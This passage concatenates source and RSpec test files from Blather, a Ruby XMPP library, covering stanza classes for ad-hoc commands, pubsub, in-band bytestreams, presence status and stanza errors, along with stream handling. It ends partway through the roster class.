expect(Blather::XMPPNode.class_from_registration(:query, 'query:ns')).to eq(QueryNs)
query_ns = QueryNs.new
expect(query_ns.xpath('query')).to be_empty
expect(query_ns.xpath('ns:query', :ns => 'query:ns').size).to eq(1)
query_ns.query
query_ns.query
expect(query_ns.xpath('ns:query', :ns => 'query:ns').size).to eq(1)
end
end
<file_sep>/lib/blather/stream/component.rb
module Blather
class Stream
# @private
class Component < Stream
NAMESPACE = 'jabber:component:accept'
def receive(node) # :nodoc:
if node.element_name == 'handshake'
ready!
else
super
end
if node.document.find_first('/stream:stream[not(stream:error)]', :xmlns => NAMESPACE, :stream => STREAM_NS)
send "<handshake>#{Digest::SHA1.hexdigest(node['id']+@password)}</handshake>"
end
end
def send(stanza)
stanza.from ||= self.jid if stanza.respond_to?(:from) && stanza.respond_to?(:from=)
super stanza
end
def start
@parser = Parser.new self
send "<stream:stream to='#{@jid}' xmlns='#{NAMESPACE}' xmlns:stream='#{STREAM_NS}'>"
end
def cleanup
@parser.finish if @parser
super
end
end #Client
end #Stream
end #Blather
<file_sep>/spec/spec_helper.rb
require 'blather'
require 'countdownlatch'
Dir[File.dirname(__FILE__) + "/support/**/*.rb"].each {|f| require f}
RSpec.configure do |config|
config.mock_with :mocha
config.filter_run :focus => true
config.run_all_when_everything_filtered = true
config.before(:each) do
EM.stubs(:schedule).yields
EM.stubs(:defer).yields
Blather::Stream::Parser.debug = true
Blather.logger = Logger.new($stdout).tap { |logger| logger.level = Logger::DEBUG }
end
end
def parse_stanza(xml)
Nokogiri::XML.parse xml
end
def jruby?
RUBY_PLATFORM =~ /java/
end
<file_sep>/spec/blather/stanza/iq/command_spec.rb
require 'spec_helper'
def command_xml
<<-XML
<iq type='result'
from='catalog.shakespeare.lit'
to='<EMAIL>/orchard'
id='form2'>
<command xmlns='http://jabber.org/protocol/commands'
node='node1'
sessionid='dqjiodmqlmakm'>
<x xmlns='jabber:x:data' type='form'>
<field var='field-name' type='text-single' label='description' />
</x>
</command>
</iq>
XML
end
describe Blather::Stanza::Iq::Command do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:command, 'http://jabber.org/protocol/commands')).to eq(Blather::Stanza::Iq::Command)
end
it 'must be importable' do
expect(Blather::XMPPNode.parse(command_xml)).to be_instance_of Blather::Stanza::Iq::Command
end
it 'ensures a command node is present on create' do
c = Blather::Stanza::Iq::Command.new
expect(c.xpath('xmlns:command', :xmlns => Blather::Stanza::Iq::Command.registered_ns)).not_to be_empty
end
it 'ensures a command node exists when calling #command' do
c = Blather::Stanza::Iq::Command.new
c.remove_children :command
expect(c.xpath('ns:command', :ns => Blather::Stanza::Iq::Command.registered_ns)).to be_empty
expect(c.command).not_to be_nil
expect(c.xpath('ns:command', :ns => Blather::Stanza::Iq::Command.registered_ns)).not_to be_empty
end
Blather::Stanza::Iq::Command::VALID_ACTIONS.each do |valid_action|
it "provides a helper (#{valid_action}?) for action #{valid_action}" do
expect(Blather::Stanza::Iq::Command.new).to respond_to :"#{valid_action}?"
end
end
Blather::Stanza::Iq::Command::VALID_STATUS.each do |valid_status|
it "provides a helper (#{valid_status}?) for status #{valid_status}" do
expect(Blather::Stanza::Iq::Command.new).to respond_to :"#{valid_status}?"
end
end
Blather::Stanza::Iq::Command::VALID_NOTE_TYPES.each do |valid_note_type|
it "provides a helper (#{valid_note_type}?) for note_type #{valid_note_type}" do
expect(Blather::Stanza::Iq::Command.new).to respond_to :"#{valid_note_type}?"
end
end
[:cancel, :execute, :complete, :next, :prev].each do |action|
it "action can be set as \"#{action}\"" do
c = Blather::Stanza::Iq::Command.new nil, nil, action
expect(c.action).to eq(action)
end
end
[:get, :set, :result, :error].each do |type|
it "can be set as \"#{type}\"" do
c = Blather::Stanza::Iq::Command.new type
expect(c.type).to eq(type)
end
end
it 'sets type to "result" on reply' do
c = Blather::Stanza::Iq::Command.new
expect(c.type).to eq(:set)
reply = expect(c.reply.type).to eq(:result)
end
it 'sets type to "result" on reply!' do
c = Blather::Stanza::Iq::Command.new
expect(c.type).to eq(:set)
c.reply!
expect(c.type).to eq(:result)
end
it 'removes action on reply' do
c = Blather::XMPPNode.parse command_xml
expect(c.action).to eq(:execute)
expect(c.reply.action).to eq(nil)
end
it 'removes action on reply!' do
c = Blather::XMPPNode.parse command_xml
expect(c.action).to eq(:execute)
c.reply!
expect(c.action).to eq(nil)
end
it 'can be registered under a namespace' do
class CommandNs < Blather::Stanza::Iq::Command; register :command_ns, nil, 'command:ns'; end
expect(Blather::XMPPNode.class_from_registration(:command, 'command:ns')).to eq(CommandNs)
c_ns = CommandNs.new
expect(c_ns.xpath('command')).to be_empty
expect(c_ns.xpath('ns:command', :ns => 'command:ns').size).to eq(1)
c_ns.command
c_ns.command
expect(c_ns.xpath('ns:command', :ns => 'command:ns').size).to eq(1)
end
it 'is constructed properly' do
n = Blather::Stanza::Iq::Command.new :set, "node", :execute
n.to = '<EMAIL>'
expect(n.find("/iq[@to='<EMAIL>' and @type='set' and @id='#{n.id}']/ns:command[@node='node' and @action='execute']", :ns => Blather::Stanza::Iq::Command.registered_ns)).not_to be_empty
end
it 'has an action attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.action).to eq(:execute)
n.action = :cancel
expect(n.action).to eq(:cancel)
end
it 'must default action to :execute on import' do
n = Blather::XMPPNode.parse(command_xml)
expect(n.action).to eq(:execute)
end
it 'has a status attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.status).to eq(:executing)
n.status = :completed
expect(n.status).to eq(:completed)
end
it 'has a sessionid attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.sessionid).to eq(nil)
n.sessionid = "somerandomstring"
expect(n.sessionid).to eq(Digest::SHA1.hexdigest("somerandomstring"))
end
it 'has a sessionid? attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.sessionid?).to eq(false)
n.new_sessionid!
expect(n.sessionid?).to eq(true)
end
it 'has an allowed_actions attribute' do
n = Blather::XMPPNode.parse command_xml
expect(n.allowed_actions).to eq([:execute])
n.allowed_actions = [:next, :prev]
expect(n.allowed_actions - [:next, :prev, :execute]).to be_empty
n.remove_allowed_actions!
expect(n.allowed_actions).to eq([:execute])
n.allowed_actions += [:next]
expect(n.allowed_actions - [:next, :execute]).to be_empty
r = Blather::Stanza::Iq::Command.new
expect(r.allowed_actions).to eq([:execute])
r.allowed_actions += [:prev]
expect(r.allowed_actions - [:prev, :execute]).to be_empty
end
it 'has a primary_allowed_action attribute' do
n = Blather::XMPPNode.parse command_xml
expect(n.primary_allowed_action).to eq(:execute)
n.primary_allowed_action = :next
expect(n.primary_allowed_action).to eq(:next)
end
it 'has a note_type attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.note_type).to eq(nil)
n.note_type = :info
expect(n.note_type).to eq(:info)
end
it 'has a note_text attribute' do
n = Blather::Stanza::Iq::Command.new
expect(n.note_text).to eq(nil)
n.note_text = "Some text"
expect(n.note_text).to eq("Some text")
expect(n.note.content).to eq("Some text")
end
it 'makes a form child available' do
n = Blather::XMPPNode.parse(command_xml)
expect(n.form.fields.size).to eq(1)
expect(n.form.fields.map { |f| f.class }.uniq).to eq([Blather::Stanza::X::Field])
expect(n.form).to be_instance_of Blather::Stanza::X
r = Blather::Stanza::Iq::Command.new
r.form.type = :form
expect(r.form.type).to eq(:form)
end
it 'ensures the form child is a child of command' do
r = Blather::Stanza::Iq::Command.new
r.form
expect(r.command.xpath('ns:x', :ns => Blather::Stanza::X.registered_ns)).not_to be_empty
expect(r.xpath('ns:x', :ns => Blather::Stanza::X.registered_ns)).to be_empty
end
end
<file_sep>/lib/blather/stanza/iq/ibb.rb
module Blather
class Stanza
class Iq
# # In-Band Bytestreams Stanza
#
# [XEP-0047: In-Band Bytestreams](http://xmpp.org/extensions/xep-0047.html)
#
# @handler :ibb_open
# @handler :ibb_data
# @handler :ibb_close
class Ibb < Iq
# @private
NS_IBB = 'http://jabber.org/protocol/ibb'
# Overrides the parent method to remove open, close and data nodes
#
# @see Blather::Stanza#reply
def reply
reply = super
reply.remove_children :open
reply.remove_children :close
reply.remove_children :data
reply
end
# An Open stanza to
class Open < Ibb
register :ibb_open, :open, NS_IBB
# Find open node
#
# @return [Nokogiri::XML::Element]
def open
find_first('ns:open', :ns => NS_IBB)
end
# Get the sid of the file transfer
#
# @return [String]
def sid
open['sid']
end
end
# A Data stanza
class Data < Ibb
register :ibb_data, :data, NS_IBB
# Find data node
#
# @return [Nokogiri::XML::Element]
def data
find_first('ns:data', :ns => NS_IBB)
end
# Get the sid of the file transfer
#
# @return [String]
def sid
data['sid']
end
end
# A Close stanza
class Close < Ibb
register :ibb_close, :close, NS_IBB
# Find close node
#
# @return [Nokogiri::XML::Element]
def close
find_first('ns:close', :ns => NS_IBB)
end
# Get the sid of the file transfer
#
# @return [String]
def sid
close['sid']
end
end
end
end
end
end
<file_sep>/lib/blather/errors/stanza_error.rb
module Blather
# Stanza errors
# RFC3920 Section 9.3 (http://xmpp.org/rfcs/rfc3920.html#stanzas-error)
#
# @handler :stanza_error
class StanzaError < BlatherError
# @private
STANZA_ERR_NS = 'urn:ietf:params:xml:ns:xmpp-stanzas'
# @private
VALID_TYPES = [:cancel, :continue, :modify, :auth, :wait].freeze
register :stanza_error
attr_reader :original, :name, :type, :text, :extras
# Factory method for instantiating the proper class for the error
#
# @param [Blather::XMPPNode] node the error node to import
# @return [Blather::StanzaError]
def self.import(node)
original = node.copy
original.remove_child 'error'
error_node = node.find_first '//*[local-name()="error"]'
name = error_node.find_first('child::*[name()!="text"]', STANZA_ERR_NS).element_name
type = error_node['type']
text = node.find_first 'descendant::*[name()="text"]', STANZA_ERR_NS
text = text.content if text
extras = error_node.find("descendant::*[name()!='text' and name()!='#{name}']").map { |n| n }
self.new original, name, type, text, extras
end
# Create a new StanzaError
#
# @param [Blather::XMPPNode] original the original stanza
# @param [String] name the error name
# @param [#to_s] type the error type as specified in
# [RFC3920](http://xmpp.org/rfcs/rfc3920.html#rfc.section.9.3.2)
# @param [String, nil] text additional text for the error
# @param [Array<Blather::XMPPNode>] extras an array of extra nodes to add
def initialize(original, name, type, text = nil, extras = [])
@original = original
@name = name
self.type = type
@text = text
@extras = extras
end
# Set the error type
#
# @param [#to_sym] type the new error type. Must be on of
# Blather::StanzaError::VALID_TYPES
# @see [RFC3920 Section 9.3.2](http://xmpp.org/rfcs/rfc3920.html#rfc.section.9.3.2)
def type=(type)
type = type.to_sym
if !VALID_TYPES.include?(type)
raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
end
@type = type
end
# The error name
#
# @return [Symbol]
def name
@name.gsub('-','_').to_sym
end
# Creates an XML node from the error
#
# @return [Blather::XMPPNode]
def to_node
node = self.original.reply
node.type = 'error'
node << (error_node = XMPPNode.new('error'))
error_node << (err = XMPPNode.new(@name, error_node.document))
error_node['type'] = self.type
err.namespace = 'urn:ietf:params:xml:ns:xmpp-stanzas'
if self.text
error_node << (text = XMPPNode.new('text', error_node.document))
text.namespace = 'urn:ietf:params:xml:ns:xmpp-stanzas'
text.content = self.text
end
self.extras.each { |extra| error_node << extra.dup }
node
end
# Convert the object to a proper node then convert it to a string
#
# @return [String]
def to_xml(*args)
to_node.to_xml(*args)
end
# @private
def inspect
"Stanza Error (#{@name}): #{self.text} [#{self.extras}]"
end
# @private
alias_method :to_s, :inspect
end # StanzaError
end # Blather
<file_sep>/spec/blather/stanza/pubsub_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:pubsub, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub)
end
it 'ensures a pubusb node is present on create' do
pubsub = Blather::Stanza::PubSub.new
expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_nil
end
it 'ensures a pubsub node exists when calling #pubsub' do
pubsub = Blather::Stanza::PubSub.new
pubsub.remove_children :pubsub
expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSub.registered_ns)).to be_nil
expect(pubsub.pubsub).not_to be_nil
expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_nil
end
it 'sets the host if requested' do
aff = Blather::Stanza::PubSub.new :get, 'pubsub.jabber.local'
expect(aff.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'ensures newly inherited items are PubSubItem objects' do
pubsub = Blather::XMPPNode.parse(items_all_nodes_xml)
expect(pubsub.items.map { |i| i.class }.uniq).to eq([Blather::Stanza::PubSub::PubSubItem])
end
end
describe Blather::Stanza::PubSub::PubSubItem do
it 'can be initialized with just an ID' do
id = 'foobarbaz'
item = Blather::Stanza::PubSub::Items::PubSubItem.new id
expect(item.id).to eq(id)
end
it 'can be initialized with a payload' do
payload = 'foobarbaz'
item = Blather::Stanza::PubSub::Items::PubSubItem.new 'foo', payload
expect(item.payload).to eq(payload)
end
it 'allows the payload to be set' do
item = Blather::Stanza::PubSub::Items::PubSubItem.new
expect(item.payload).to be_nil
item.payload = 'testing'
expect(item.payload).to eq('testing')
expect(item.content).to eq('testing')
end
it 'allows the payload to be unset' do
payload = 'foobarbaz'
item = Blather::Stanza::PubSub::Items::PubSubItem.new 'foo', payload
expect(item.payload).to eq(payload)
item.payload = nil
expect(item.payload).to be_nil
end
it 'makes payloads readable as string' do
payload = Blather::XMPPNode.new 'foo'
item = Blather::Stanza::PubSub::Items::PubSubItem.new 'bar', payload
expect(item.payload).to eq(payload.to_s)
end
end
<file_sep>/lib/blather/xmpp_node.rb
module Blather
# Base XML Node
# All XML classes subclass XMPPNode it allows the addition of helpers
class XMPPNode < Niceogiri::XML::Node
# @private
BASE_NAMES = %w[presence message iq].freeze
# @private
@@registrations = {}
class_attribute :registered_ns, :registered_name
# Register a new stanza class to a name and/or namespace
#
# This registers a namespace that is used when looking
# up the class name of the object to instantiate when a new
# stanza is received
#
# @param [#to_s] name the name of the node
# @param [String, nil] ns the namespace the node belongs to
def self.register(name, ns = nil)
self.registered_name = name.to_s
self.registered_ns = ns
@@registrations[[self.registered_name, self.registered_ns]] = self
end
# Find the class to use given the name and namespace of a stanza
#
# @param [#to_s] name the name to lookup
# @param [String, nil] xmlns the namespace the node belongs to
# @return [Class, nil] the class appropriate for the name/ns combination
def self.class_from_registration(name, ns = nil)
reg = @@registrations[[name.to_s, ns]]
return @@registrations[[name.to_s, nil]] if !reg && ["jabber:client", "jabber:component:accept"].include?(ns)
reg
end
# Import an XML::Node to the appropriate class
#
# Looks up the class the node should be then creates it based on the
# elements of the XML::Node
# @param [XML::Node] node the node to import
# @return the appropriate object based on the node name and namespace
def self.import(node, *decorators)
ns = (node.namespace.href if node.namespace)
klass = class_from_registration(node.element_name, ns)
if klass && klass != self
klass.import(node, *decorators)
else
new(node.element_name).decorate(*decorators).inherit(node)
end
end
# Parse a string as XML and import to the appropriate class
#
# @param [String] string the string to parse
# @return the appropriate object based on the node name and namespace
def self.parse(string)
import Nokogiri::XML(string).root
end
# Create a new Node object
#
# @param [String, nil] name the element name
# @param [XML::Document, nil] doc the document to attach the node to. If
# not provided one will be created
# @return a new object with the registered name and namespace
def self.new(name = registered_name, doc = nil)
super name, doc, BASE_NAMES.include?(name.to_s) ? nil : self.registered_ns
end
def self.decorator_modules
if self.const_defined?(:InstanceMethods)
[self::InstanceMethods]
else
[]
end
end
def decorate(*decorators)
decorators.each do |decorator|
decorator.decorator_modules.each do |mod|
extend mod
end
@handler_hierarchy.unshift decorator.handler_hierarchy.first if decorator.respond_to?(:handler_hierarchy)
end
self
end
def content_from(name, ns = nil)
content = super
if !content && !ns
return super("ns:#{name}", ns: "jabber:client") || super("ns:#{name}", ns: "jabber:component:accept")
end
content
end
# Turn the object into a proper stanza
#
# @return a stanza object
def to_stanza
self.class.import self
end
end # XMPPNode
end # Blather
<file_sep>/lib/blather/stanza/disco.rb
module Blather
class Stanza
# # Disco Base class
#
# Use Blather::Stanza::DiscoInfo or Blather::Stanza::DiscoItems
class Disco < Iq::Query
# Get the name of the node
#
# @return [String] the node name
def node
query[:node]
end
# Set the name of the node
#
# @param [#to_s] node the new node name
def node=(node)
query[:node] = node
end
# Compare two Disco objects by name, type and category
# @param [Disco] o the Identity object to compare against
# @return [true, false]
def eql?(o, *fields)
super o, *(fields + [:node])
end
end
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/presence/status.rb
module Blather
class Stanza
class Presence
# # Status Stanza
#
# [RFC 3921 Section 2.2.2 - Presence Child Elements](http://xmpp.org/rfcs/rfc3921.html#rfc.section.2.2.2)
#
# Presence stanzas are used to express an entity's current network
# availability (offline or online, along with various sub-states of the
# latter and optional user-defined descriptive text), and to notify other
# entities of that availability.
#
# ## "State" Attribute
#
# The `state` attribute determains the availability of the entity and can be
# one of the following:
#
# * `:available` -- The entity or resource is available
#
# * `:away` -- The entity or resource is temporarily away.
#
# * `:chat` -- The entity or resource is actively interested in chatting.
#
# * `:dnd` -- The entity or resource is busy (dnd = "Do Not Disturb").
#
# * `:xa` -- The entity or resource is away for an extended period (xa =
# "eXtended Away").
#
# Blather provides a helper for each possible state:
#
# Status#available?
# Status#away?
# Status#chat?
# Status#dnd?
# Status#xa?
#
# Blather treats the `type` attribute like a normal ruby object attribute
# providing a getter and setter. The default `type` is `available`.
#
# status = Status.new
# status.state # => :available
# status.available? # => true
# status.state = :away
# status.away? # => true
# status.available? # => false
# status
# status.state = :invalid # => RuntimeError
#
# ## "Type" Attribute
#
# The `type` attribute is inherited from Presence, but limits the value to
# either `nil` or `:unavailable` as these are the only types that relate to
# Status.
#
# ## "Priority" Attribute
#
# The `priority` attribute sets the priority of the status for the entity
# and must be an integer between -128 and 127.
#
# ## "Message" Attribute
#
# The optional `message` element contains XML character data specifying a
# natural-language description of availability status. It is normally used
# in conjunction with the show element to provide a detailed description of
# an availability state (e.g., "In a meeting").
#
# Blather treats the `message` attribute like a normal ruby object attribute
# providing a getter and setter. The default `message` is nil.
#
# status = Status.new
# status.message # => nil
# status.message = "gone!"
# status.message # => "gone!"
#
# @handler :status
class Status < Presence
# @private
# The spec requires only the following 4 states
VALID_STATES = [:away, :chat, :dnd, :xa].freeze
VALID_TYPES = [:unavailable].freeze
# ...but this is the sorted list of possible states
POSSIBLE_STATES = [:unavailable, :dnd, :xa, :away, :available, :chat].freeze
include Comparable
register :status, :status
# Create a new Status stanza
#
# @param [<:away, :chat, :dnd, :xa>] state the state of the status
# @param [#to_s] message a message to send with the status
def self.new(state = nil, message = nil)
node = super()
node.state = state
node.message = message
node
end
module InstanceMethods
# Check if the state is available
#
# @return [true, false]
def available?
self.state == :available
end
# Check if the state is away
#
# @return [true, false]
def away?
self.state == :away
end
# Check if the state is chat
#
# @return [true, false]
def chat?
self.state == :chat
end
# Check if the state is dnd
#
# @return [true, false]
def dnd?
self.state == :dnd
end
# Check if the state is xa
#
# @return [true, false]
def xa?
self.state == :xa
end
# Set the state
# Ensure state is one of :available, :away, :chat, :dnd, :xa or nil
#
# @param [<:available, :away, :chat, :dnd, :xa, nil>] state
def state=(state) # :nodoc:
state = state.to_sym if state
state = nil if state == :available
if state && !VALID_STATES.include?(state)
raise ArgumentError, "Invalid Status (#{state}), use: #{VALID_STATES*' '}"
end
set_content_for :show, state
end
# Get the state of the status
#
# @return [<:available, :away, :chat, :dnd, :xa>]
def state
state = type || content_from(:show)
state = :available if state.blank?
state.to_sym
end
# Set the priority of the status
# Ensures priority is between -128 and 127
#
# @param [Fixnum<-128...127>] new_priority
def priority=(new_priority) # :nodoc:
if new_priority && !(-128..127).include?(new_priority.to_i)
raise ArgumentError, 'Priority must be between -128 and +127'
end
set_content_for :priority, new_priority
end
# Get the priority of the status
#
# @return [Fixnum<-128...127>]
def priority
read_content(:priority).to_i
end
# Get the status message
#
# @return [String, nil]
def message
read_content :status
end
# Set the status message
#
# @param [String, nil] message
def message=(message)
set_content_for :status, message
end
# Compare status based on priority and state:
# unavailable status is always less valuable than others
# Raises an error if the JIDs aren't the same
#
# @param [Blather::Stanza::Presence::Status] o
# @return [true,false]
def <=>(o)
if self.from || o.from
unless self.from.stripped == o.from.stripped
raise ArgumentError, "Cannot compare status from different JIDs: #{[self.from, o.from].inspect}"
end
end
if (self.type.nil? && o.type.nil?) || (!self.type.nil? && !o.type.nil?)
if self.priority == o.priority
POSSIBLE_STATES.index(self.state) <=> POSSIBLE_STATES.index(o.state)
else
self.priority <=> o.priority
end
elsif self.type.nil? && !o.type.nil?
1
elsif !self.type.nil? && o.type.nil?
-1
end
end
end
include InstanceMethods
end #Status
end #Presence
end #Stanza
end #Blather
<file_sep>/lib/blather/stream/client.rb
module Blather
class Stream
# @private
class Client < Stream
LANG = 'en'
VERSION = '1.0'
NAMESPACE = 'jabber:client'
def start
@parser = Parser.new self
send "<stream:stream to='#{@to}' xmlns='#{NAMESPACE}' xmlns:stream='#{STREAM_NS}' version='#{VERSION}' xml:lang='#{LANG}'>"
end
def send(stanza)
stanza.from = self.jid if stanza.is_a?(Stanza) && !stanza.from.nil?
super stanza
end
def cleanup
@parser.finish if @parser
super
end
end #Client
end #Stream
end #Blather
<file_sep>/lib/blather/stanza/pubsub.rb
module Blather
class Stanza
# # Pubsub Stanza
#
# [XEP-0060 - Publish-Subscribe](http://xmpp.org/extensions/xep-0060.html)
#
# The base class for all PubSub nodes. This provides helper methods common to
# all PubSub nodes.
#
# @handler :pubsub_node
class PubSub < Iq
register :pubsub_node, :pubsub, 'http://jabber.org/protocol/pubsub'
# @private
def self.import(node)
klass = nil
if pubsub = node.document.find_first('//ns:pubsub', :ns => self.registered_ns)
pubsub.children.detect do |e|
ns = e.namespace ? e.namespace.href : nil
klass = class_from_registration(e.element_name, ns)
end
end
(klass || self).new(node[:type]).inherit(node)
end
# Overwrites the parent constructor to ensure a pubsub node is present.
# Also allows the addition of a host attribute
#
# @param [<Blather::Stanza::Iq::VALID_TYPES>] type the IQ type
# @param [String, nil] host the host the node should be sent to
def self.new(type = nil, host = nil)
new_node = super type
new_node.to = host
new_node.pubsub
new_node
end
# Overrides the parent to ensure the current pubsub node is destroyed before
# inheritting the new content
#
# @private
def inherit(node)
remove_children :pubsub
super
end
# Get or create the pubsub node on the stanza
#
# @return [Blather::XMPPNode]
def pubsub
p = find_first('ns:pubsub', :ns => self.class.registered_ns) ||
find_first('pubsub', :ns => self.class.registered_ns)
unless p
self << (p = XMPPNode.new('pubsub', self.document))
p.namespace = self.class.registered_ns
end
p
end
end # PubSub
# # PubSubItem Fragment
#
# This fragment is found in many places throughout the pubsub spec
# This is a convenience class to attach methods to the node
class PubSubItem < XMPPNode
# Create a new PubSubItem
#
# @param [String, nil] id the id of the stanza
# @param [#to_s, nil] payload the payload to attach to this item.
# @param [XML::Document, nil] document the document the node should be
# attached to. This should be the document of the parent PubSub node.
def self.new(id = nil, payload = nil, document = nil)
return id if id.class == self
new_node = super 'item', document
new_node.id = id
new_node.payload = payload if payload
new_node
end
# Get the item's ID
#
# @return [String, nil]
def id
read_attr :id
end
# Set the item's ID
#
# @param [#to_s] id the new ID
def id=(id)
write_attr :id, id
end
alias_method :payload_node, :child
# Get the item's payload
#
# @return [String, nil]
def payload
children.empty? ? nil : children.to_s
end
# Set the item's payload
#
# @param [String, XMPPNode, nil] payload the payload
def payload=(payload)
children.map &:remove
return unless payload
if payload.is_a?(String)
self.content = payload
else
self << payload
end
end
end # PubSubItem
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/iq/ping.rb
module Blather
class Stanza
class Iq
# # Ping Stanza
#
# [XEP-0199: XMPP Ping](http://xmpp.org/extensions/xep-0199.html)
#
# This is a base class for any Ping based Iq stanzas.
#
# @handler :ping
class Ping < Iq
# @private
register :ping, :ping, 'urn:xmpp:ping'
# Overrides the parent method to ensure a ping node is created
#
# @see Blather::Stanza::Iq.new
def self.new(type = :get, to = nil, id = nil)
node = super
node.ping
node
end
# Overrides the parent method to ensure the current ping node is destroyed
#
# @see Blather::Stanza::Iq#inherit
def inherit(node)
ping.remove
super
end
# Ping node accessor
# If a ping node exists it will be returned.
# Otherwise a new node will be created and returned
#
# @return [Balather::XMPPNode]
def ping
p = find_first 'ns:ping', :ns => self.class.registered_ns
unless p
(self << (p = XMPPNode.new('ping', self.document)))
p.namespace = self.class.registered_ns
end
p
end
end
end
end
end
<file_sep>/spec/blather/stanza/iq_spec.rb
require 'spec_helper'
describe Blather::Stanza::Iq do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:iq, nil)).to eq(Blather::Stanza::Iq)
end
it 'must be importable' do
string = "<iq from='<EMAIL>/balcony' type='set' id='roster_4'></iq>"
expect(Blather::XMPPNode.parse(string)).to be_instance_of Blather::Stanza::Iq
end
it 'creates a new Iq stanza defaulted as a get' do
expect(Blather::Stanza::Iq.new.type).to eq(:get)
end
it 'sets the id when created' do
expect(Blather::Stanza::Iq.new.id).not_to be_nil
end
it 'creates a new Stanza::Iq object on import' do
expect(Blather::Stanza::Iq.import(Blather::XMPPNode.new('iq'))).to be_kind_of Blather::Stanza::Iq
end
it 'creates a proper object based on its children' do
n = Blather::XMPPNode.new('iq')
n << Blather::XMPPNode.new('query', n.document)
expect(Blather::Stanza::Iq.import(n)).to be_kind_of Blather::Stanza::Iq::Query
end
it 'ensures type is one of Stanza::Iq::VALID_TYPES' do
expect { Blather::Stanza::Iq.new :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::Stanza::Iq::VALID_TYPES.each do |valid_type|
n = Blather::Stanza::Iq.new valid_type
expect(n.type).to eq(valid_type)
end
end
Blather::Stanza::Iq::VALID_TYPES.each do |valid_type|
it "provides a helper (#{valid_type}?) for type #{valid_type}" do
expect(Blather::Stanza::Iq.new).to respond_to :"#{valid_type}?"
end
end
it 'removes the body when replying' do
iq = Blather::Stanza::Iq.new :get, '<EMAIL>'
iq.from = '<EMAIL>'
iq << Blather::XMPPNode.new('query', iq.document)
r = iq.reply
expect(r.children.empty?).to eq(true)
end
it 'does not remove the body when replying if we ask to keep it' do
iq = Blather::Stanza::Iq.new :get, '<EMAIL>'
iq.from = '<EMAIL>'
iq << Blather::XMPPNode.new('query', iq.document)
r = iq.reply :remove_children => false
expect(r.children.empty?).to eq(false)
end
end
<file_sep>/spec/blather/stanza/presence/subscription_spec.rb
require 'spec_helper'
describe Blather::Stanza::Presence::Subscription do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:subscription, nil)).to eq(Blather::Stanza::Presence::Subscription)
end
[:subscribe, :subscribed, :unsubscribe, :unsubscribed].each do |type|
it "must be importable as #{type}" do
expect(Blather::XMPPNode.parse("<presence type='#{type}'/>")).to be_kind_of Blather::Stanza::Presence::Subscription::InstanceMethods
end
end
it 'can set to on creation' do
sub = Blather::Stanza::Presence::Subscription.new 'a@b'
expect(sub.to.to_s).to eq('a@b')
end
it 'can set a type on creation' do
sub = Blather::Stanza::Presence::Subscription.new nil, :subscribed
expect(sub.type).to eq(:subscribed)
end
it 'strips Blather::JIDs when setting #to' do
sub = Blather::Stanza::Presence::Subscription.new 'a@b/c'
expect(sub.to.to_s).to eq('a@b')
end
it 'generates an approval using #approve!' do
sub = Blather::Stanza.import Nokogiri::XML('<presence from="a@b" type="subscribe"><status/></presence>').root
sub.approve!
expect(sub.to).to eq('a@b')
expect(sub.type).to eq(:subscribed)
end
it 'generates a refusal using #refuse!' do
jid = Blather::JID.new 'a@b'
sub = Blather::Stanza::Presence::Subscription.new
sub.from = jid
sub.refuse!
expect(sub.to).to eq(jid)
expect(sub.type).to eq(:unsubscribed)
end
it 'generates an unsubscript using #unsubscribe!' do
jid = Blather::JID.new 'a@b'
sub = Blather::Stanza::Presence::Subscription.new
sub.from = jid
sub.unsubscribe!
expect(sub.to).to eq(jid)
expect(sub.type).to eq(:unsubscribe)
end
it 'generates a cancellation using #cancel!' do
jid = Blather::JID.new 'a@b'
sub = Blather::Stanza::Presence::Subscription.new
sub.from = jid
sub.cancel!
expect(sub.to).to eq(jid)
expect(sub.type).to eq(:unsubscribed)
end
it 'generates a request using #request!' do
jid = Blather::JID.new 'a@b'
sub = Blather::Stanza::Presence::Subscription.new
sub.from = jid
sub.request!
expect(sub.to).to eq(jid)
expect(sub.type).to eq(:subscribe)
end
it 'has a #request? helper' do
sub = Blather::Stanza::Presence::Subscription.new
expect(sub).to respond_to :request?
sub.type = :subscribe
expect(sub.request?).to eq(true)
end
it "successfully routes chained actions" do
from = Blather::JID.new("<EMAIL>")
to = Blather::JID.new("<EMAIL>")
sub = Blather::Stanza::Presence::Subscription.new
sub.from = from
sub.to = to
sub.cancel!
sub.unsubscribe!
expect(sub.type).to eq(:unsubscribe)
expect(sub.to).to eq(from)
expect(sub.from).to eq(to)
end
it "will inherit only another node's attributes" do
inheritable = Blather::XMPPNode.new 'foo'
inheritable[:bar] = 'baz'
sub = Blather::Stanza::Presence::Subscription.new
expect(sub).to respond_to :inherit
sub.inherit inheritable
expect(sub[:bar]).to eq('baz')
end
end
<file_sep>/lib/blather/roster.rb
module Blather
# Local Roster
# Takes care of adding/removing JIDs through the stream
class Roster
include Enumerable
attr_reader :version
# Create a new roster
#
# @param [Blather::Stream] stream the stream the roster should use to
# update roster entries
# @param [Blather::Stanza::Iq::Roster] stanza a roster stanza used to preload
# the roster
# @return [Blather::Roster]
def initialize(stream, stanza = nil)
@stream = stream
@items = {}
process(stanza) if stanza
end
# Process any incoming stanzas and either adds or removes the
# corresponding RosterItem
#
# @param [Blather::Stanza::Iq::Roster] stanza a roster stanza
def process(stanza)
@version = stanza.version
stanza.items.each do |i|
case i.subscription
when :remove then @items.delete(key(i.jid))
